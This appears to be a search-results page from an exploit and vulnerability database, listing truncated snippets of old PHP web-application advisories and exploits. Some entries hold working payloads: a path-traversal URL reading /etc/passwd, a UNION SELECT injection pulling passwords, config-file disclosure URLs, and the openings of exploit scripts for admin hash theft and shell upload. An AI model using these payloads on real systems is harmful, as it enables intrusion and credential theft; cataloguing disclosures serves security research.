1410 matches found
Design/Logic Flaw
admin/modifconfig.php in Blog Pixel Motion aka PixelMotion does not require admin authentication, which allows remote authenticated users to upload arbitrary PHP scripts in a ZIP archive, which is written to templateZip/ and then automatically extracted under templates/ for execution via a direct...
mole-disclose.txt
Mole v2.1.0 viewsource.php Remote File Disclosure Vulnerability Script : http://sourceforge.net/project/showfiles.php?groupid=164171 Vuln Code : Mole: Template viewer POC : /mole210/viewsource.php?dirn=include/config.inc.php /mole210/viewsource.php?fname=include/config.inc.php...
PHP 5.x < 5.2 Multiple Vulnerabilities
According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2. Such versions may be affected by several buffer overflows. To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the remote server or to manipulate several...
PEEL CMS Admin Hash Extraction and Remote Upload Exploit
No description provided by source. !/usr/bin/php ?php /---------------------------------------------------------------\ Exploit: PEEL CMS Admin Hash Extraction and Remote Upload Credits: Charles "real" F. charlesfolathotmail.fr URL: http://realn.free.fr/ Date: 03-18-08 Targets: PEEL PREMIUM PEEL...
zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit
Exploit for unknown platform in category web applications ============================================ zKup CMS 2.0 Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/...
Dynamic photo Gallery 1.02 - albumID SQL Injection
Dynamic photo Gallery 1.02 - albumID SQL Injection Aria-Security Team http://Aria-Security.Net ---------------------------- Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php Original Link:...
Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/28056/info Simple PHP Scripts 'gallery' is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an...
LightBlog 9.6 - 'Username' Local File Inclusion
lightblog 9.6 local file inclusion vulnerability download http://www.publicwarehouse.co.uk/phpscripts/lightblog.php author muuratsalo contact muuratsaloatgmail.com exploit http://localhost/LightBlog9.6/viewmember.php?username=../../../../../../../../../../etc/passwd%00 milw0rm.com 2008-02-18...
Mix Systems CMS (parent/id) Remote SQL Injection Exploit
No description provided by source. ? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "----------------------------antichat.ru------------------------"."\n"; if $argc!=4...
wdcs-xss.txt
Aria-Security Team Persian Security Network httP://Aria-Security.Net --------------------------------------------- Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N, A Special Thanks to my dear friend Mhp0rtal for his great help in order to find this vuln. Vendor: http://www.softwebsnepal.com Demo:...
Mix Systems CMS - 'parent/id' SQL Injection
? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "----------------------------antichat.ru------------------------"."\n"; if $argc!=4 echo " Usage: php ".$argv0." host...
WordPress fGallery 'fim_rss.php' 'album' Parameter SQL Injection
The remote host is running fGallery, a third-party image gallery plugin for WordPress. The version of fGallery installed on the remote host fails to sanitize input to the 'album' parameter of the 'fim_rss.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' setting...
LulieBlog 1.0.1 - Remote Authentication Bypass
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LulieBlog 1.0.1 delete id Remote Admin Bypass Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- bug found by ka0x contact: D.O.M TEAM 2008 we are: ka0x, an0de, xarnuz from spain download:...
LulieBlog 1.0.1 - Remote Authentication Bypass
LulieBlog 1.0.1 - Remote Authentication Bypass -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LulieBlog 1.0.1 delete id Remote Admin Bypass Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- bug found by ka0x contact: D.O.M TEAM 2008 we are: ka0x, an0de,...
Tribisur <= 2.0 Remote SQL Injection Exploit
No description provided by source. !/usr/bin/php -q ?php echo "Tribisur = 2.0 Remote SQL Injection Exploit\r\n"; echo "Coded by x0kster -x0ksterATgmailDOTcom - \r\n"; / Script Download : http://www.comscripts.com/scripts/php.tribisur-20.1211.html Bug 1 in modules/forum/liste.php : First, this...
WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload
AUTHOR : H-T TeaM HouSSaMix ToXiC350 HOME : http://no-hack.net Script : Wordpress Plugin Wp-FileManager Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip BUG : Remote File Upload Vulnerability Shell Upload Exploit | 3xpl0it4t10n : This file allowed you to upload directly a P...
Tribisur <= 2.0 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ============================================ Tribisur And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2...
Bypass the web environment keyword monitoring attempt-vulnerability warning-the black bar safety net
by Don not Fox http://blog.wang1.cn Problem: win2003+php environment, the server has something installed similar to the "best information monitoring system". The thing is, it blocks a certain set of keywords. So when I am in phpshell and execute SQL queries and system commands, you are prompted that the file does not have permissi...
Unfixed XSS vulnerability at kkanari.org
Security researcher tweetycoaster submitted on 28/12/2007 a cross-site scripting (XSS) vulnerability affecting kkanari.org, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 16/01/2008. It is currently...
mBlog 1.2 - 'page' Remote File Disclosure
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: : : : vuln.: mBlog 1.2 Remote File Disclosure Vulnerability : : script info and download: http://www.c97.net/dl/index.php?act=view&id=8 : : no dork for s-kiddie ; : : : : author: irk4zatyahoo.pl : : greets to: str0ke,...